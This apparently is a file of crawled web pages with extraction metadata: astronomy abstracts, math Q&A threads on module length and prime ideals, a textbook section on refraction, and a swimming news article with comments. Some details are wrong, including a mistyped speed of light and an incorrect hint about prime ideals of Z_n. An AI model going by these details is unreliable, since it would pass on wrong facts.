Weak-lensing peak counts has been shown to be a powerful tool for cosmology. It provides non-Gaussian information of large scale structures, complementary to second order statistics. We propose a new flexible method to predict weak lensing peak counts, which can be adapted to realistic scenarios, such as a real source distribution, intrinsic galaxy alignment, mask effects, photo-z errors from surveys, etc. The new model is also suitable for applying the tomography technique and non-linear filters. A probabilistic approach to model peak counts is presented. First, we sample halos from a mass function. Second, we assign them NFW profiles. Third, we place those halos randomly on the field of view. The creation of these "fast simulations" requires much less computing time compared to N-body runs. Then, we perform ray-tracing through these fast simulation boxes and select peaks from weak-lensing maps to predict peak number counts. The computation is achieved by our \textsc{Camelus} algorithm, which we make available at this http URL. We compare our results to N-body simulations to validate our model. We find that our approach is in good agreement with full N-body runs. We show that the lensing signal dominates shape noise and Poisson noise for peaks with SNR between 4 and 6. Also, counts from the same SNR range are sensitive to Ωm and σ8. We show how our model can discriminate between various combinations of those two parameters. In summary, we offer a powerful tool to study weak lensing peaks. The potential of our forward model is its high flexibility, making the use of peak counts under realistic survey conditions feasible.
## Summary
A new, probabilistic model for weak-lensing peak counts is being proposed in this first paper of a series of three. The model is based on drawing halos from the mass function and, via ray-tracing, generating weak-lensing maps to count peaks. These simulated maps can directly be compared to observations, making this a forward-modelling approach of the cluster mass function, in contrast to many other traditional methods using cluster probes such as X-ray, optical richness, or SZ observations.
The model prediction is in very good agreement with N-body simulations.
It is very flexible, and can potentially include astrophysical and observational effects, such as intrinsic alignment, halo triaxiality, masking, photo-z errors, etc. Moreover, the pdf of the number of peaks can be output by the model, allowing for a very general likelihood calculation, without e.g. assuming a Gaussian distribution of the observables.
## CFHTLenS tomographic weak lensing: Quantifying accurate redshift distributions
Authors: J. Benjamin, L. Van Waerbeke, C. Heymans, M. Kilbinger, et al. Journal: MNRAS Year: 2013 Download: ADS | arXiv
## Abstract
The Canada-France-Hawaii Telescope Lensing Survey (CFHTLenS) comprises deep multi-colour (u*g'r'i'z') photometry spanning 154 square degrees, with accurate photometric redshifts and shape measurements. We demonstrate that the redshift probability distribution function summed over galaxies provides an accurate representation of the galaxy redshift distribution accounting for random and catastrophic errors for galaxies with best fitting photometric redshifts z_p < 1.3.
We present cosmological constraints using tomographic weak gravitational lensing by large-scale structure. We use two broad redshift bins 0.5 < z_p <= 0.85 and 0.85 < z_p <= 1.3 free of intrinsic alignment contamination, and measure the shear correlation function on angular scales in the range ~1-40 arcmin. We show that the problematic redshift scaling of the shear signal, found in previous CFHTLS data analyses, does not afflict the CFHTLenS data. For a flat Lambda-CDM model and a fixed matter density Omega_m=0.27, we find the normalisation of the matter power spectrum sigma_8=0.771 \pm 0.041. When combined with cosmic microwave background data (WMAP7), baryon acoustic oscillation data (BOSS), and a prior on the Hubble constant from the HST distance ladder, we find that CFHTLenS improves the precision of the fully marginalised parameter estimates by an average factor of 1.5-2. Combining our results with the above cosmological probes, we find Omega_m=0.2762 \pm 0.0074 and sigma_8=0.802 \pm 0.013.
## CFHTLenS tomographic weak lensing cosmological parameter constraints: Mitigating the impact of intrinsic galaxy alignments
Authors: C. Heymans, E. Grocutt, A. Heavens, M. Kilbinger, et al. Journal: MNRAS Year: 2013 Download: ADS | arXiv
## Abstract
We present a finely-binned tomographic weak lensing analysis of the Canada-France-Hawaii Telescope Lensing Survey, CFHTLenS, mitigating contamination to the signal from the presence of intrinsic galaxy alignments via the simultaneous fit of a cosmological model and an intrinsic alignment model. CFHTLenS spans 154 square degrees in five optical bands, with accurate shear and photometric redshifts for a galaxy sample with a median redshift of zm =0.70. We estimate the 21 sets of cosmic shear correlation functions associated with six redshift bins, each spanning the angular range of 1.5<theta<35 arcmin. We combine this CFHTLenS data with auxiliary cosmological probes: the cosmic microwave background with data from WMAP7, baryon acoustic oscillations with data from BOSS, and a prior on the Hubble constant from the HST distance ladder. This leads to constraints on the normalisation of the matter power spectrum sigma_8 = 0.799 +/- 0.015 and the matter density parameter Omega_m = 0.271 +/- 0.010 for a flat Lambda CDM cosmology. For a flat wCDM cosmology we constrain the dark energy equation of state parameter w = -1.02 +/- 0.09. We also provide constraints for curved Lambda CDM and wCDM cosmologies. We find the intrinsic alignment contamination to be galaxy-type dependent with a significant intrinsic alignment signal found for early-type galaxies, in contrast to the late-type galaxy sample for which the intrinsic alignment signal is found to be consistent with zero. | 2021-06-20 19:54:49 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 9, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6076451539993286, "perplexity": 2175.018551592281}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623488253106.51/warc/CC-MAIN-20210620175043-20210620205043-00172.warc.gz"} |
http://math.stackexchange.com/questions/570883/a-noetherian-module-annihilated-by-a-power-of-maximal-ideal-must-has-finite-leng | # A Noetherian module annihilated by a power of maximal ideal must has finite length.
Let $M$ be a Noetherian $R$-module and $P^kM=0$ from some maximal ideal $P$ of $R$ and some integer $k$. How to show that $M$ has finite length?
The length of a module is defined to be the maximum length of the chain of submodule: $$0=M_0<M_1<\cdots<M_{n-1}<M_n=M$$
I have tried following. We can assume there is no strict submodule between $M_i$ and $M_{i+1}$, and try to prove such $n$ is bounded.
Then we have $$M_i/M_{i+1}\cong R/Q_i$$
where $Q_i=\operatorname{ann}_R(M_i/M_{i+1})$ is maximal.
Then I cannot move on. I tried to look at the localization of the chain at $P$, but it seems to provide nothing.
Could anyone help?
-
## 2 Answers
WLOG, choose $k$ to be the smallest possible. Consider the sequence of submodules
$$(*)\qquad0=MP^{k} \subsetneq MP^{k-1} \subsetneq \dots \subsetneq MP \subsetneq M \,.$$
The goal is to show that every consequtive factor of this sequence is of finite length.
For arbitrary $l \in \{0,1, \dots, k-1\},$ consider the factor $MP^l/MP^{l+1}$. Since $M$ is noetherian, this clearly is a finitely generated module. The annihilator $\mathrm{Ann}_R(MP^l/MP^{l+1})$ clearly contains the maximal ideal $P$. On the other hand, from the strictness of the inclusion $MP^{l+1} \subsetneq MP^{l}$ it follows that $1 \notin \mathrm{Ann}_R(MP^l/MP^{l+1})$, hence (since $P$ is maximal) $\mathrm{Ann}_R(MP^l/MP^{l+1})=P,$ a maximal ideal.
Now, since any module $N$ can be considered as $R/\mathrm{Ann}_R(N)$-module (with the multiplication defined by $n \cdot (r+\mathrm{Ann}_R(N)):=nr$ and the important property that the lattice of submodules does not change by this shift of perspective), we can see that $MP^l/MP^{l+1}$ is actually finitely-generated $R/P$-module, i.e. a vector space of finite dimension. Hence, it is of finite length.
Adding more details:
It is a well-known fact that a module $M$ is of finite length iff it has a finite composition series, i.e. a finite chain of submodules from $0$ to $M$ with the consecutive factors simple. Now, we have shown (for arbitrary $l$) that $MP^l/MP^{l+1}$ are of finite length, hence there exist a composition series $$0=MP^{l+1}/MP^{l+1}=N_0^{l} \subseteq N_{1}^{l} \subseteq \dots \subseteq N_{k_l}^{l}=MP^{l}/MP^{l+1}$$ with simple consecutive factors. After applying the correspondence theorem, we obtain a chain of submodules of $M$ $$MP^{l+1}=\overline{N_0^{l}}\subseteq \overline{N_1^{l}} \subseteq \dots \subseteq \overline{N_{k_l}^{l}}=MP^{l}$$ again with simple consecutive factors. Doing this for every $l$, we obtain a refinement of the series $(*)$ with simple consecutive factors of finite length, i.e. a composition series of module $M$ of finite length.
-
Sorry but I think you only proved this specific chain has finite length. What about other chains? Isn't the length of a module the maximal length of all possible chains? – hxhxhx88 Nov 17 '13 at 21:54
Jordan - Hölder. – Martin Brandenburg Nov 17 '13 at 22:00
@hxhxhx88 Sorry, I thought this was clear. It uses the fact that module is of finite length if and only if it has a finite composition series. I will add a comment about it into the answer. – PavelC Nov 17 '13 at 22:16
$P^kM=0$ implies $P^k\subset Ann_R(M)$. This shows that $R/Ann_R(M)$ is an artinian ring (its only prime ideal being $P/Ann_R(M)$), so $M$ is an artinian $R/Ann_R(M)$-module, that is, an artinian $R$-module and we are done.
-
Sorry, your approach is too advanced. My commutative algebra course has't covered the Artinian ring yet..If it is possible, could you expand it a little bit? – hxhxhx88 Nov 17 '13 at 21:56 | 2014-10-01 04:28:34 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9228955507278442, "perplexity": 179.6178818700131}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-41/segments/1412037663359.6/warc/CC-MAIN-20140930004103-00299-ip-10-234-18-248.ec2.internal.warc.gz"} |
https://math.stackexchange.com/questions/2569986/describe-all-prime-and-maximal-ideals-of-mathbbz-n | # Describe all prime and maximal ideals of $\mathbb{Z}_n$
I know that an ideal P in $\mathbb{Z}_n$ is prime if and only if $\mathbb{Z}_n/P$ is an integral domain and an ideal m in $\mathbb{Z}_n$ is maximal if and only if $\mathbb{Z}_n$/m is a field. I think I've figured out that $\mathbb{Z}_p$ where p is a prime that divides n make up the maximal ideals.
I have no idea how to figure out which are prime. Help?
Hint: Write $m=\Pi_{i=1}^{i=n}p_i^{n_i}$ where $p_i$ is a prime number, the prime and maximal ideals are generated by the class of $p_1^{n_1}..p_i^{n_i-1}..p_n^{i_n}$. The Chinese remainder theorem implies that $\mathbb{Z}_m\simeq \mathbb{Z}/p_1^{n_1}\times...\times \mathbb{Z}/p_1^{n_1}$ and $\mathbb{Z}_m/p_1^{n_1}..p_i^{n_i-1}..p_n^{i_n}\simeq\mathbb{Z}/p_i$.
• so what are the prime ideals? I don't really follow this – John Smith Dec 17 '17 at 2:31
• the prime and maximal are the same – Tsemo Aristide Dec 17 '17 at 2:33 | 2019-07-18 17:59:58 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7793238162994385, "perplexity": 74.0656566285093}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-30/segments/1563195525699.51/warc/CC-MAIN-20190718170249-20190718192249-00007.warc.gz"} |
https://phys.libretexts.org/TextMaps/General_Physics_Textmaps/Map%3A_College_Physics_(OpenStax)/25%3A_Geometric_Optics/25.4%3A_The_Law_of_Refraction | $$\require{cancel}$$
# 25.4: The Law of Refraction
It is easy to notice some odd things when looking into a fish tank. For example, you may see the same fish appearing to be in two different places. (See Figure 1.) This is because light coming from the fish to us changes direction when it leaves the tank, and in this case, it can travel two different paths to get to our eyes. The changing of a light ray’s direction (loosely called bending) when it passes through variations in matter is called refraction. Refraction is responsible for a tremendous range of optical phenomena, from the action of lenses to voice transmission through optical fibers.
REFRACTION
The changing of a light ray’s direction (loosely called bending) when it passes through variations in matter is called refraction.
SPEED OF LIGHT
The speed of light $$c$$ not only affects refraction, it is one of the central concepts of Einstein’s theory of relativity. As the accuracy of the measurements of the speed of light were improved, $$c$$ was found not to depend on the velocity of the source or the observer. However, the speed of light does vary in a precise manner with the material it traverses. These facts have far-reaching implications, as we will see in "Special Relativity." It makes connections between space and time and alters our expectations that all observers measure the same time for the same event, for example. The speed of light is so important that its value in a vacuum is one of the most fundamental constants in nature as well as being one of the four fundamental SI units.
Figure 25.4.1. Looking at the fish tank as shown, we can see the same fish in two different locations, because light changes directions when it passes from water to air. In this case, the light can reach the observer by two different paths, and so the fish seems to be in two different places. This bending of light is called refraction and is responsible for many optical phenomena.
Why does light change direction when passing from one material (medium) to another? It is because light changes speed when going from one material to another. So before we study the law of refraction, it is useful to discuss the speed of light and how it varies in different media.
# The Speed of Light
Early attempts to measure the speed of light, such as those made by Galileo, determined that light moved extremely fast, perhaps instantaneously. The first real evidence that light traveled at a finite speed came from the Danish astronomer Ole Roemer in the late 17th century. Roemer had noted that the average orbital period of one of Jupiter’s moons, as measured from Earth, varied depending on whether Earth was moving toward or away from Jupiter. He correctly concluded that the apparent change in period was due to the change in distance between Earth and Jupiter and the time it took light to travel this distance. From his 1676 data, a value of the speed of light was calculated to be $$2.26 \times 10^{8} m/s$$ (only 25% different from today’s accepted value). In more recent times, physicists have measured the speed of light in numerous ways and with increasing accuracy. One particularly direct method, used in 1887 by the American physicist Albert Michelson (1852–1931), is illustrated in Figure 2. Light reflected from a rotating set of mirrors was reflected from a stationary mirror 35 km away and returned to the rotating mirrors. The time for the light to travel can be determined by how fast the mirrors must rotate for the light to be returned to the observer’s eye.
Figure 25.4.2. A schematic of early apparatus used by Michelson and others to determine the speed of light. As the mirrors rotate, the reflected ray is only briefly directed at the stationary mirror. The returning ray will be reflected into the observer's eye only if the next mirror has rotated into the correct position just as the ray returns. By measuring the correct rotation rate, the time for the round trip can be measured and the speed of light calculated. Michelson’s calculated value of the speed of light was only 0.04% different from the value used today.
The speed of light is now known to great precision. In fact, the speed of light in a vacuum $$c$$ is so important that it is accepted as one of the basic physical quantities and has the fixed value $c = 2.9972458 \times 10^{8} \sim 3.00 \times 10^{8} m/s,$ where the approximate value of $$3.00 \times 10^{8} m/s$$ is used whenever three-digit accuracy is sufficient. The speed of light through matter is less than it is in a vacuum, because light interacts with atoms in a material. The speed of light depends strongly on the type of material, since its interaction with different atoms, crystal lattices, and other substructures varies. We define the index of refraction $$n$$ of a material to be $n = \frac{c}{v}, \tag{25.4.1}$ where $$v$$ is the observed speed of light in the material. Since the speed of light is always less than $$c$$ in matter and equals $$c$$ only in a vacuum, the index of refraction is always greater than or equal to one.
VALUE OF THE SPEED OF LIGHT:
$c = 2.9972458 \times 10^{8} \sim 3.00 \times 10^{8} m/s$
INDEX OF REFRACTION:
$n = \frac{c}{v}, \tag{25.4.1}$
That is, $$n \gt 1$$. The table gives the indices of refraction for some representative substances. The values are listed for a particular wavelength of light, because they vary slightly with wavelength. (This can have important effects, such as colors produced by a prism.) Note that for gases, $$n$$ is close to 1.0. This seems reasonable, since atoms in gases are widely separated and light travels at $$c$$ in the vacuum between atoms. It is common to take $$n = 1$$ for gases unless great precision is needed. Although the speed of light v in a medium varies considerably from its value c in a vacuum, it is still a large speed.
INSERT TABLE!
Example $$\PageIndex{1}$$: Speed of Light in Matter
Calculate the speed of light in zircon, a material used in jewelry to imitate diamond.
Strategy:
The speed of light in a material, $$v$$, can be calculated from the index of refraction $$n$$ of the material using the equation $$n = c/v$$.
Solution:
The equation for index of refraction states that $$n = c/v$$. Rearranging this to determine $$v$$ gives $v = \frac{c}{n}.$ The index of refraction for zircon is given as 1.923 in the table, and $$c$$ is given in the equation for speed of light. Entering these values in the last expression gives $v = \frac{3.00 \times 10^{8} m/s}{1.923}$ $= 1.56 \times 10^{8} m/s.$
Discussion:
This speed is slightly larger than half the speed of light in a vacuum and is still high compared with speeds we normally experience. The only substance listed in the Table that has a greater index of refraction than zircon is diamond. We shall see later that the large index of refraction for zircon makes it sparkle more than glass, but less than diamond.
# Law of Refraction
Figure 3 shows how a ray of light changes direction when it passes from one medium to another. As before, the angles are measured relative to a perpendicular to the surface at the point where the light ray crosses it. (Some of the incident light will be reflected from the surface, but for now we will concentrate on the light that is transmitted.) The change in direction of the light ray depends on how the speed of light changes. The change in the speed of light is related to the indices of refraction of the media involved. In the situations shown in Figure 3, medium 2 has a greater index of refraction than medium 1. This means that the speed of light is less in medium 2 than in medium 1. Note that as shown in Figure 3a, the direction of the ray moves closer to the perpendicular when it slows down. Conversely, as shown in Figure 3b, the direction of the ray moves away from the perpendicular when it speeds up. The path is exactly reversible. In both cases, you can imagine what happens by thinking about pushing a lawn mower from a footpath onto grass, and vice versa. Going from the footpath to grass, the front wheels are slowed and pulled to the side as shown. This is the same change in direction as for light when it goes from a fast medium to a slow one. When going from the grass to the footpath, the front wheels can move faster and the mower changes direction as shown. This, too, is the same change in direction as for light going from slow to fast.
Figure 25.4.3. The change in direction of a light ray depends on how the speed of light changes when it crosses from one medium to another. The speed of light is greater in medium 1 than in medium 2 in the situations shown here. (a) A ray of light moves closer to the perpendicular when it slows down. This is analogous to what happens when a lawn mower goes from a footpath to grass. (b) A ray of light moves away from the perpendicular when it speeds up. This is analogous to what happens when a lawn mower goes from grass to footpath. The paths are exactly reversible.
The amount that a light ray changes its direction depends both on the incident angle and the amount that the speed changes. For a ray at a given incident angle, a large change in speed causes a large change in direction, and thus a large change in angle. The exact mathematical relationship is the law of refraction, or "Snell's Law," which is stated in equation form as $n_{1} \sin_{\theta_{1}} = n_{2} \sin_{\theta_{2}}.\tag{25.4.2}$ Here, $$n_{1}$$ and $$n_{2}$$ are the indices of refraction for medium 1 and 2, and $$\theta_{1}$$ and $$\theta_{2}$$ are the angles between the rays and the perpendicular in medium 1 and 2, as shown in Figure 3. The incoming ray is called the incident ray and the outgoing ray the refracted ray, and the associated angles the incident angle and the refracted angle. The law of refraction is also called Snell’s law after the Dutch mathematician Willebrord Snell (1591–1626), who discovered it in 1621. Snell’s experiments showed that the law of refraction was obeyed and that a characteristic index of refraction $$n$$ could be assigned to a given medium. Snell was not aware that the speed of light varied in different media, but through experiments he was able to determine indices of refraction from the way light rays changed direction.
THE LAW OF REFRACTION:
$n_{1} \sin_{\theta_{1}} = n_{2} \sin_{\theta_{2}}.\tag{25.4.2}$
TAKE-HOME EXPERIMENT: A BROKEN PENCIL:
A classic observation of refraction occurs when a pencil is placed in a glass half filled with water. Do this and observe the shape of the pencil when you look at the pencil sideways, that is, through air, glass, water. Explain your observations. Draw ray diagrams for the situation.
Example $$\PageIndex{2}$$: Determine the Index of Refraction from Refraction Data:
Find the index of refraction for medium 2 in Figure 3a, assuming medium 1 is air and given the incident angle is $$30.0^{\circ}$$ and the angle of refraction is $$22.0^{\circ}$$.
Strategy:
The index of refraction for air is taken to be 1 in most cases (and up to four significant figures, it is 1.000). Thus $$n_{1} = 1.00$$ here. From the given information, $$\theta_{1} = 30.0^{\circ}$$ and $$\theta_{2} = 22.0^{\circ}$$ With this information, the only unknown in Snell’s law is $$n_{2}$$, so that it can be used to find this unknown.
Solution:
Snell's law is $n_{1} \sin_{\theta_{1}} = n_{2} \sin_{\theta_{2}}.\tag{25.4.2}$ Rearranging to isolate $$n_{2}$$ gives $n_{2} = n_{1}\frac{\sin{\theta_{1}}}{\sin{\theta_{2}}}.$ Entering known values, $n_{2} = n_{1}\frac{\sin{30.0^{\circ}}}{\sin{22.0^{\circ}}} = \frac{0.500}{0.375}$ $=1.33.$
Discussion:
This is the index of refraction for water, and Snell could have determined it by measuring the angles and performing this calculation. He would then have found 1.33 to be the appropriate index of refraction for water in all other situations, such as when a ray passes from water to glass. Today we can verify that the index of refraction is related to the speed of light in a medium by measuring that speed directly.
Example: A Larger Change in Direction:
Suppose that in a situation like that in the previous example, light goes from air to diamond and that the incident angle is $$30.0^{\circ}$$. Calculate the angle of refraction $$\theta_{2}$$ in the diamond.
Strategy:
Again the index of refraction for air is taken to be $$n_{1} = 1.00$$, and we are given $$\theta_{1} = 30.0^{\circ}$$. We can look up the index of refraction for diamond in the table, finding $$n_{2} = 2.419$$. The only unknown in Snell’s law is $$\theta_{2}$$, which we wish to determine.
Solution:
Solving Snell’s law for $$\sin{\theta_{2}}$$ yields $\sin{\theta_{2}} = \frac{n_{1}}{n_{2}}\sin{\theta_{1}}.$ Entering known values, $sin{\theta_{2}} = \frac{1.00}{2.419} \sin{30.0^{\circ}} = \left( 0.413 \right) \left( 0.500 \right) = 0.207.$ The angle is thus $\theta_{2} = \sin{0.207}^{-1} = 11.9^{\circ}.$
Discussion:
For the same $$30^{\circ}$$ angle of incidence, the angle of refraction in diamond is significantly smaller than in water ($$11.9^{\circ}$$ rather than $$22^{\circ}$$ -- see the preceding example).
This means there is a larger change in direction in diamond. The cause of a large change in direction is a large change in the index of refraction (or speed). In general, the larger the change in speed, the greater the effect on the direction of the ray.
# Summary
• The changing of a light ray’s direction when it passes through variations in matter is called refraction.
• The speed of light in vacuuum $$c = 2.9972458 \times 10^{8} \sim 3.00 \times 10^{8} m/s$$
• Index of refraction $$n = \frac{c}{v}$$, where $$v$$ is the speed of light in the material, $$c$$ is the speed of light in vacuum, and $$n$$ is the index of refraction.
• Snell’s law, the law of refraction, is stated in equation form as $$n_{1} \sin_{\theta_{1}} = n_{2} \sin_{\theta_{2}}$$.
## Glossary
refraction - changing of a light ray’s direction when it passes through variations in matter
index of refraction - for a material, the ratio of the speed of light in vacuum to that in the material | 2017-03-23 00:17:40 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6641455292701721, "perplexity": 255.45095945390074}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-13/segments/1490218186530.52/warc/CC-MAIN-20170322212946-00026-ip-10-233-31-227.ec2.internal.warc.gz"} |
https://swimswam.com/ncaa-denies-request-increase-ncaa-qualifiers-limit-mens-swimming/ | # NCAA Denies Request to Increase NCAA Qualifiers Limit for Men’s Swimming
September 24th, 2014
On Tuesday, the NCAA’s Division II Championships Committee announced over $800,000 in budget allocation increases to enhance “participant opportunities and overall championship experience” for the division’s student-athletes. While 17 requests were approved, a request by swimming & diving was one of 11 requests denied, and one of just three “increases in championship qualifiers” requests that were rejected (wrestling and golf, both requesting a bigger budget, were also denied). Specifically, swimming requested$39,000 for a “field size cap limit adjustment for male swimmers.”
Currently, the Division II meet is capped at 175 men and 205 women.
Among the requests that were approved were increases in championships squad size for women’s volleyball, a men’s soccer bracket expansion to 38 teams, a women’s lacrosse bracket expansion to 12 teams, increased golf super regional sizes, increased football bracket size and squad size, increased championship squad sizes in men’s and women’s basketball, and a baseball bracket expansion to 56 teams.
There were also several approvals for increases in officials pay in various sports, and the addition of an “Eagle Eye” video review system for track & field.
The other change that will directly impact swimming: is that teams and individuals located within 600 miles of the championship site will travel via ground transportation, up from 500 miles. This is estimated to save $341,000, which contributed to the increased funding in other areas. ### 8 Leave a Reply Subscribe Notify of 8 Comments Inline Feedbacks View all comments D-II Supporter 6 years ago In the now famous words of John Blutarsky (God rest his soul)…. Eh, hmmmmm, ********!!!!!! Sack participating schools within that extra 100 miles to save$350,000, but can’t spare an extra \$40,000 to make sure the Men’s D-II NCAA Swimming Championships has a minimum of 16 competitors in every event.
That’s similar to the reasoning behind the Germans bombing Pearl Harbor????
Great work by our universities president’s…I wonder if Faber U’s Dream Wormer headed up that committee??!!??
D-II Supporter
6 years ago
Oops, Dean Wormer
Phil
6 years ago
I have no problem with extending the bracket sizes of the various sports (as essentially that’s what swimming was asking for), but is it necessary to have more volleyball players and men’s/women’s basketball players suit up to ride the pine at a game that’s already being contested? That makes no sense to me. Those teams were already at that level using the resources they have, and I can assure you (knowing teams that have made it that far in those sports) that there were players not playing that were suited up.
6 years ago
I am somewhat surprised at the not allowing the additional men’s swimmers, but I am shocked at the 600 mile ground transportation rule. Anyone who has spent 10-12 HOURS in a bus or car, will know that feeling you feel at the end of the trip — stiff and feel miserable.
6 years ago
Another swim dad here, albeit a psycho one. My inspired comment on that: secret solution is to take to champs meets only short fly and breaststroke swimmers. They do not need much leg room in the bus and they will be fresher than free and back swimmers of other teams. I got some more good ideas but I am busy pushing our girls to swim and telling our boy to give up unless he wants to convert to football.
Sven
6 years ago
Just wanted to chime in as a short former butterflyer: the image in my head of a bunch of flyers– short, broad shouldered, and pissed off– crammed in a bus like it’s a clown car is pretty hilarious.
But I’m gonna take your idea one step further: let’s just cut out all non-fly events (excepting the 50 and 100 freestyles) from the sport of swimming. Back and free are okay, but so boring to watch and train. I know you mentioned breaststrokers too, but let’s be honest, it’s not a real stroke. This would have saved me untold amounts of misery growing up. Additionally, by giving breaststroke the axe, you and I would disagree much less frequently :-D. I’ll let… Read more »
Peter Davis
6 years ago
Tall butterflier here. Yes, please, eliminate breaststroke. Now, about your joint proposal, I can get behind that…or to the left of it, as it were. In fact, four of my close friends and I will back up the proposal. So you might say….I got five on it.
6 years ago
Do NCAA execs fly or take their own car when they travel distances are 200 miles or more? (FYI – 200 miles is about 3 1/2 hours in a car – so I’d bet they fly). Seems like another place to save some money.
Braden Keith is the Editor-in-Chief and a co-founder/co-owner of SwimSwam.com. He first got his feet wet by building The Swimmers' Circle beginning in January 2010, and now comes to SwimSwam to use that experience and help build a new leader in the sport of swimming. Aside from his life on the InterWet, … | 2021-09-22 01:40:47 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.1937365084886551, "perplexity": 4930.196686614376}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057303.94/warc/CC-MAIN-20210922011746-20210922041746-00318.warc.gz"} |
http://mathoverflow.net/questions/52563/approximating-expectation?sort=newest | # Approximating expectation [closed]
if we are given a finite number N of points drawn from a probability distribution, expectation can be approximated as a finite sum over these points: E[f]=(1/N)(summation of f(x) over these N points).
comparing this to the actual calculation of E[f]=summation of p(x)f(x), won't the difference between the actual value and approximate value be a lot in cases where p(x) varies a lot?
-
## closed as not a real question by Nate Eldredge, George Lowther, Qiaochu Yuan, Yemon Choi, Andres CaicedoJan 20 '11 at 6:39
It's difficult to tell what is being asked here. This question is ambiguous, vague, incomplete, overly broad, or rhetorical and cannot be reasonably answered in its current form. For help clarifying this question so that it can be reopened, visit the help center. If this question can be reworded to fit the rules in the help center, please edit the question.
Yes it might. The standard deviation of the sample mean will be large if the underlying distribution has too large standard deviation (if that's what you mean by "varies a lot"). But this is far from a research level question, so not really suitable here. Maybe math.stackexchange would be a better fit? – George Lowther Jan 20 '11 at 0:24
Or stats.stackexchange.com. You are interested in something like the variance of the sample mean. – Nate Eldredge Jan 20 '11 at 3:57
## 1 Answer
The Strong Law of Large Numbers guarantees almost sure convergence of the sample mean to the population mean. If your distribution has large variance then yes the convergence is slower. However, the probability of being away from the population mean is bounded by:
$P(|s_n-\mu|>\epsilon)<\frac{\sigma^2}{n\epsilon^2}$
Where $\mu$ and $\sigma$ are true mean and standard deviation and $s_n$ is the sample mean from $n$ points.
-
It's worth commenting that all bets are off if the population has a distribution that doesn't have a finite variance. – Brian Borchers Jan 20 '11 at 0:44
@Brian: the SLLN holds with no assumption on the variance. It requires only the assumption of finite mean. – Qiaochu Yuan Jan 20 '11 at 0:49
Are there rate of convergence estimates when dealing with infinite variance? I would guess one would have to truncate the random variables... – Alex R. Jan 20 '11 at 1:30
